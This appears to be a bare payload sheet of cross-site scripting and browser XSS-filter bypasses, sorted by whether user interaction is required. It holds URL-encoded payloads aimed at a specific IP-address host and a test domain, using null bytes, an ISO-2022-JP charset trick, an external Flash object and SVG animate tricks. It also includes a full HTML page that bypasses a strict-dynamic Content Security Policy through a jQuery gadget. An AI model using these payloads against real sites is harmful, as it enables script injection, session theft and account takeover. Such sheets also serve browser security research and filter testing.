Tested version:

Test environment:

No user interaction required

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

CSP bypass via jQuery Gadget

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';">
<script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script>
<script nonce=random>
$(document).ready(function(){
    // code taken from http://api.jquery.com/after/
    $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
XSS XSS XSS
<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>
XSS XSS XSS
<p class="container"></p>
</body>
</html>

User interaction required

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C